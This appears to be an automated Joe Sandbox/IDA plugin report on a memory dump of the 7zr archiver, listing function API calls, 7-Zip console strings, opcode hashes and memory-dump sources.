                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: Find$FileFirst$CloseH_prolog
                                    • String ID:
                                    • API String ID: 3371352514-0
                                    • Opcode ID: eee7246b39d12b4f827cce8d8a708f75abdf5dae9c0d130a342fd73e449a0803
                                    • Instruction ID: 07115ca109a60763fc22bfa547d71ab2b5f9b11758b4b25940ccc952d9466b4c
                                    • Opcode Fuzzy Hash: eee7246b39d12b4f827cce8d8a708f75abdf5dae9c0d130a342fd73e449a0803
                                    • Instruction Fuzzy Hash: 0911903150020DEBCF10EFA4C855AFDB779EF50364F20462DEAA157192DB318E86DB40

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block a2a013-a2a01a; blocks span a2a013 to a2acb5.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$ExceptionThrow
                                    • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                    • API String ID: 3665150552-429544124
                                    • Opcode ID: 44379dc106533e3d72e4a438e44145cf88bee3f36d7c94b9c089ce0cc91614fc
                                    • Instruction ID: d4f1a5ddc9f4f24a1d69f5009dabf4f8d67fd0f85eb86d94b60332ef3af97ca4
                                    • Opcode Fuzzy Hash: 44379dc106533e3d72e4a438e44145cf88bee3f36d7c94b9c089ce0cc91614fc
                                    • Instruction Fuzzy Hash: B852AE30904269DFCF26DBA8DD85BEDBBB5BF94300F1441AAE149A7291DB316E84CF11

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block a2a42c-a2a433; blocks span a2a42c to a2acb5.
                                    APIs
                                    • fputs.MSVCRT(Scanning the drive for archives:), ref: 00A2A43E
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputcfputs
                                    • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                    • API String ID: 269475090-3104439828
                                    • Opcode ID: b75e1da835a34d35fbca7d1dee58ab952dcfa21faaf6c444c3b23f12841e077d
                                    • Instruction ID: 2254b7a326e7e6b3ab89b0b08721446a4c1f0f02ab5e2ab6a38164c3f0ff7418
                                    • Opcode Fuzzy Hash: b75e1da835a34d35fbca7d1dee58ab952dcfa21faaf6c444c3b23f12841e077d
                                    • Instruction Fuzzy Hash: 4C228E31900268DFDF2AEBA8D945BEDFBB1BF94300F1440AAE55963291DB716E84CF11

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block a28012-a28032; blocks span a28012 to a282b9.
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A28017
                                    • fputs.MSVCRT ref: 00A2804D
                                      • Part of subcall function 00A28341: __EH_prolog.LIBCMT ref: 00A28346
                                      • Part of subcall function 00A28341: fputs.MSVCRT ref: 00A2835B
                                      • Part of subcall function 00A28341: fputs.MSVCRT ref: 00A28364
                                    • fputs.MSVCRT ref: 00A2807A
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                      • Part of subcall function 009F965D: VariantClear.OLEAUT32(?), ref: 009F967F
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A281AA
                                    • fputs.MSVCRT ref: 00A281CD
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A28267
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A282B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                    • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                    • API String ID: 2889736305-3797937567
                                    • Opcode ID: ff1dfec3422057e7f13822911e03c3702503cac7ac2beaff7df6804430ec58b0
                                    • Instruction ID: bdeba71307ec44b5c060f86d9bb8717ff7aff52671a76834eb7ca20f266bd100
                                    • Opcode Fuzzy Hash: ff1dfec3422057e7f13822911e03c3702503cac7ac2beaff7df6804430ec58b0
                                    • Instruction Fuzzy Hash: 61914831A01625EFDF18DFA8E985AEEB7B5FF48310F204129F512E7291DB74A905CB60

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block a26766-a26792; blocks span a26766 to a2695a.
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2676B
                                    • EnterCriticalSection.KERNEL32(00AB2938), ref: 00A26781
                                    • fputs.MSVCRT ref: 00A2680B
                                    • LeaveCriticalSection.KERNEL32(00AB2938), ref: 00A26944
                                      • Part of subcall function 00A2C7D7: fputs.MSVCRT ref: 00A2C840
                                    • fputs.MSVCRT ref: 00A26851
                                      • Part of subcall function 009F2201: fputs.MSVCRT ref: 009F221E
                                    • fputs.MSVCRT ref: 00A268D9
                                    • fputs.MSVCRT ref: 00A268F6
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                    • String ID: v$Sub items Errors:
                                    • API String ID: 2670240366-2468115448
                                    • Opcode ID: 27d9983d824dd76cd51c608d19c0b8be2d4077dadf0cfed8bdc2f62410857fad
                                    • Instruction ID: c0039546815c4892360beb1ad58bb0e3536c147e44e9daeaead16832c4f820cb
                                    • Opcode Fuzzy Hash: 27d9983d824dd76cd51c608d19c0b8be2d4077dadf0cfed8bdc2f62410857fad
                                    • Instruction Fuzzy Hash: 6C519031602600CFCB25DF68E994BE9B7E2FF84320F54443EE19A87261CB316C85CB94

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block a26359-a26373; blocks span a26359 to a266fd.
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2635E
                                    • fputs.MSVCRT ref: 00A2645F
                                      • Part of subcall function 00A2C7D7: fputs.MSVCRT ref: 00A2C840
                                    • fputs.MSVCRT ref: 00A26547
                                    • fputs.MSVCRT ref: 00A2665F
                                    • fputs.MSVCRT ref: 00A266AE
                                      • Part of subcall function 009F1F91: fflush.MSVCRT ref: 009F1F93
                                      • Part of subcall function 009F1FB3: __EH_prolog.LIBCMT ref: 009F1FB8
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog$fflushfree
                                    • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                    • API String ID: 1750297421-1898165966
                                    • Opcode ID: d9788fce49110ec4dc960e1ffc8a0ca4cb7a8040bc6fef45919704c7781150ed
                                    • Instruction ID: ba2ebfa1437413bf1e5f1fa9e58774d59ac607f887fada6ae7d4a1a8632dc2b3
                                    • Opcode Fuzzy Hash: d9788fce49110ec4dc960e1ffc8a0ca4cb7a8040bc6fef45919704c7781150ed
                                    • Instruction Fuzzy Hash: 1CB16D30602715CFDB28EF68E9A1BAAB7E1FF44314F04453DE69A57292CB71AD44CB90

                                    Control-flow Graph (rendered basic-block graph not reproduced; legend: Executed / Not Executed). Entry block 9f6c72-9f6c8e; blocks span 9f6c72 to 9f715f.
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 009F6C77
                                    • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 009F6EC9
                                      • Part of subcall function 009F6C72: wcscmp.MSVCRT ref: 009F70A5
                                      • Part of subcall function 009F6BF5: __EH_prolog.LIBCMT ref: 009F6BFA
                                      • Part of subcall function 009F6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 009F6C1A
                                      • Part of subcall function 009F6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 009F6C49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                    • String ID: :$DATA
                                    • API String ID: 3316598575-2587938151
                                    • Opcode ID: 335753a21077bd83c07b4bedd69cfe806a5fde26d9a4d332f7ffce58fd037ab9
                                    • Instruction ID: 46edc225e3ba92b7e87088c7fbae20cd34025cc43aa8a2a4c44ffd9eebe4808a
                                    • Opcode Fuzzy Hash: 335753a21077bd83c07b4bedd69cfe806a5fde26d9a4d332f7ffce58fd037ab9
                                    • Instruction Fuzzy Hash: BBE13231A0430DDACF21EFA4C891BFEF7B5AF54314F204519EA866B2D2DB70A949CB50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog
                                    • String ID: =
                                    • API String ID: 2614055831-2525689732
                                    • Opcode ID: 10b2220205b38bc553ebe92f66a307834e844cf0e2177a1d946c547b98dcdca2
                                    • Instruction ID: 5d0356811dff2647fe81993554bcb13d0a64ef7c942137e6adbe84d94dfaf588
                                    • Opcode Fuzzy Hash: 10b2220205b38bc553ebe92f66a307834e844cf0e2177a1d946c547b98dcdca2
                                    • Instruction Fuzzy Hash: A4216D32905118EFCF09EB98E952BEDBBB5EF88310F20002AF50572192DF756E45CBA5
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A28346
                                    • fputs.MSVCRT ref: 00A2835B
                                    • fputs.MSVCRT ref: 00A28364
                                      • Part of subcall function 00A283BF: __EH_prolog.LIBCMT ref: 00A283C4
                                      • Part of subcall function 00A283BF: fputs.MSVCRT ref: 00A28401
                                      • Part of subcall function 00A283BF: fputs.MSVCRT ref: 00A28437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog
                                    • String ID: =
                                    • API String ID: 2614055831-2525689732
                                    • Opcode ID: ea1fad000b9a27b42fc67de273177a0942e54443f032b29fd4e40672802bd08a
                                    • Instruction ID: 07c656ee84d2257a9bb92bd68e3973d057c5eddb0ae17e0a1baa0a7a313aacc1
                                    • Opcode Fuzzy Hash: ea1fad000b9a27b42fc67de273177a0942e54443f032b29fd4e40672802bd08a
                                    • Instruction Fuzzy Hash: 0601A231A00019EBCF05FBA8D812BEEBB76EF84710F10402AF505962A1CF794A55DBD5
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A1209B
                                      • Part of subcall function 009F757D: GetLastError.KERNEL32(009FD14C), ref: 009F757D
                                      • Part of subcall function 00A12C6C: __EH_prolog.LIBCMT ref: 00A12C71
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ErrorLastfree
                                    • String ID: Cannot find archive file$The item is a directory
                                    • API String ID: 683690243-1569138187
                                    • Opcode ID: 35f6115f1bee9941719dc0c352fa901e84621f32288ec2cc53afd58aca072962
                                    • Instruction ID: a773ceb9e4cf73553aa7731a2199deec12821197b027f95f8cc761306829db21
                                    • Opcode Fuzzy Hash: 35f6115f1bee9941719dc0c352fa901e84621f32288ec2cc53afd58aca072962
                                    • Instruction Fuzzy Hash: DA724774D00258DFCB25DFA8C984BEDBBB5BF58300F24409AE959AB252C7709E91CF91
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: CountTickfputs
                                    • String ID: .
                                    • API String ID: 290905099-4150638102
                                    • Opcode ID: 07b029423ae785851c614ddf38939e082c31c432050db2176f1a32d51891aa67
                                    • Instruction ID: 92171c9bf02d0ab366bc7588b58a75a1732a8a24c084c3f91c4473ec61befdf2
                                    • Opcode Fuzzy Hash: 07b029423ae785851c614ddf38939e082c31c432050db2176f1a32d51891aa67
                                    • Instruction Fuzzy Hash: 1E715730600B189FCB25EF68D991BAEB7F6AF81714F10482DE58797A41DB70F949CB11
                                    APIs
                                      • Part of subcall function 009F9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 009F9CB3
                                      • Part of subcall function 009F9C8F: GetProcAddress.KERNEL32(00000000), ref: 009F9CBA
                                      • Part of subcall function 009F9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 009F9CC8
                                    • __aulldiv.LIBCMT ref: 00A3093F
                                    • __aulldiv.LIBCMT ref: 00A3094B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                    • String ID: 3333
                                    • API String ID: 3520896023-2924271548
                                    • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                    • Instruction ID: 5b088fa5e193e8e8a97f458e9dce8b9e77ae97328a5a1876d5e8ed9229f3d258
                                    • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                    • Instruction Fuzzy Hash: 8E2195B19007046FE730EF7A8881B5BBAF9FB84750F00892EB18AD3642D670A9408B65
                                    APIs
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    • memset.MSVCRT ref: 00A1AEBA
                                    • memset.MSVCRT ref: 00A1AECD
                                      • Part of subcall function 00A304D2: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A304F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: memset$ExceptionThrowfree
                                    • String ID: Split
                                    • API String ID: 1404239998-1882502421
                                    • Opcode ID: 3f6dcd315a741492b63e720ee606b91e052fb9414fe26efb56b2b53f408c8f64
                                    • Instruction ID: 30b78843b3120bc54b2a5e095d8bf087516b446e526628de2c90b224deed66a4
                                    • Opcode Fuzzy Hash: 3f6dcd315a741492b63e720ee606b91e052fb9414fe26efb56b2b53f408c8f64
                                    • Instruction Fuzzy Hash: D5427A30A05248DFDF25DBA4C984BEDBBB6BF55304F2440A9E449A7252CB31AEC5CF52
                                    APIs
                                    • fputs.MSVCRT ref: 00A28437
                                    • fputs.MSVCRT ref: 00A28401
                                      • Part of subcall function 009F1FB3: __EH_prolog.LIBCMT ref: 009F1FB8
                                    • __EH_prolog.LIBCMT ref: 00A283C4
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prologfputs$fputc
                                    • String ID:
                                    • API String ID: 678540050-0
                                    • Opcode ID: 4076f19b03baca7c7b81d4e5b8783106cbc44822646adf8b2cfaa6e291d720fa
                                    • Instruction ID: 03af76c54afc2b49379cc5972894dc09a19c55f49eb5ba41e68955cdab4c1189
                                    • Opcode Fuzzy Hash: 4076f19b03baca7c7b81d4e5b8783106cbc44822646adf8b2cfaa6e291d720fa
                                    • Instruction Fuzzy Hash: 21118631B0411A9BCF09B7A4D8137BEBFB5EFC0760F100029F60193291DF6A194187D4
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A12CE0
                                      • Part of subcall function 009F5E10: __EH_prolog.LIBCMT ref: 009F5E15
                                      • Part of subcall function 00A041EC: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A0421A
                                      • Part of subcall function 009F965D: VariantClear.OLEAUT32(?), ref: 009F967F
                                    Strings
                                    • Cannot create output directory, xrefs: 00A13070
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ClearExceptionThrowVariant
                                    • String ID: Cannot create output directory
                                    • API String ID: 814188403-1181934277
                                    • Opcode ID: d386cc15efb78c297115e1e397ca56b9407011783e4bd1ef7faed53a3c45aa2d
                                    • Instruction ID: 354e11a5c0d7622d74610deb5350cde6114943f111734b3a354224912ee859f0
                                    • Opcode Fuzzy Hash: d386cc15efb78c297115e1e397ca56b9407011783e4bd1ef7faed53a3c45aa2d
                                    • Instruction Fuzzy Hash: A8F1B131901289EFCF21EFA4C990BEDBFB5BF58300F1440A9E54567252DB31AE96CB51
                                    APIs
                                    • fputs.MSVCRT ref: 00A2C840
                                      • Part of subcall function 009F25CB: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 009F25ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionThrowfputs
                                    • String ID:
                                    • API String ID: 1334390793-399585960
                                    • Opcode ID: 925445313ced93fc435957e22825607feced8653e9591f3523406e01f151af90
                                    • Instruction ID: cd79746fbebee4aa5e2cdb89aefb3bec9ce94c7bbdce39ff575f6d26255d9a7d
                                    • Opcode Fuzzy Hash: 925445313ced93fc435957e22825607feced8653e9591f3523406e01f151af90
                                    • Instruction Fuzzy Hash: 2C11B2716047449FDB25CF5CD8D1BAABBE6EF85314F14847EE1468B251C7B1B804C760
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: Open
                                    • API String ID: 1795875747-71445658
                                    • Opcode ID: 61f4e7ca1c9478b745913735417c57eed5b8df660979d7bac1d4fbd7e8dd187b
                                    • Instruction ID: f6638e39da4b919dec66d9c5108a2ee1101b5c50ffeab4e8a75d96b30f806667
                                    • Opcode Fuzzy Hash: 61f4e7ca1c9478b745913735417c57eed5b8df660979d7bac1d4fbd7e8dd187b
                                    • Instruction Fuzzy Hash: E1119E321057149FC720EF78E991AEABBA5EF54320B50893EE19A87212DB31B904CF50
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A406B3
                                    • _CxxThrowException.MSVCRT(?,00AAD480), ref: 00A408F2
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionThrow$H_prologmalloc
                                    • String ID:
                                    • API String ID: 3044594480-0
                                    • Opcode ID: a0aa179cf8342e58650e16ab80d01f52af52c712f60dd6651fadd7ebcc1c5a34
                                    • Instruction ID: ed780125618b5e4d33119976722cbe9a72325a3bf742ddac2f7b7032fe4fbb52
                                    • Opcode Fuzzy Hash: a0aa179cf8342e58650e16ab80d01f52af52c712f60dd6651fadd7ebcc1c5a34
                                    • Instruction Fuzzy Hash: DE914975900249DFCF21DFA8C981EEEBBB5BF49304F1441A9E549A7252CB30AE44DFA1
                                    APIs
                                    Memory Dump Source
